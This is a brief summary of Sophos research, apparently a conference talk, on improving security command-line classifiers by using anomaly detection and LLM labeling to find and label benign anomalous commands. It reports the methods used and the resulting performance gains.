
Researchers Improve Cybersecurity Command-Line Classification with Anomaly Detection and LLMs
Researchers Ben Gellman and Sean Bruin from Sophos presented a method to improve cybersecurity command-line classification by leveraging anomaly detection and large language models (LLMs) to label benign anomalous data. Their approach addressed the limitations of traditional anomaly detection, which generates high false-positive rates (e.g., 2% FPR equating to 2 million false positives in 100 million commands), by using LLMs like OpenAI’s 03 Mini to filter benign anomalies with high precision. The system employed multiple anomaly detection algorithms—Isolation Forest (for full-scale data), K-Means, and PCA (for reduced-scale data)—to identify diverse anomalies, which were then deduplicated using embeddings and cosine similarity before LLM labeling. Testing on two baselines (regex-based and aggregated labeling) demonstrated significant performance gains, with AUROC scores improving from 61 to 89 on the harder "manual labels" test set. The method proved scalable, requiring only a few days of data to saturate performance, and maintained or improved accuracy on original distributions. Key tools included XGBoost for classification, Gina embeddings for feature extraction, and distributed computing for handling billions of daily command lines. The research concluded that anomaly detection excels at finding benign long-tail data, LLMs enable automated labeling pipelines, and benign anomaly augmentation generalizes to enhance cybersecurity models.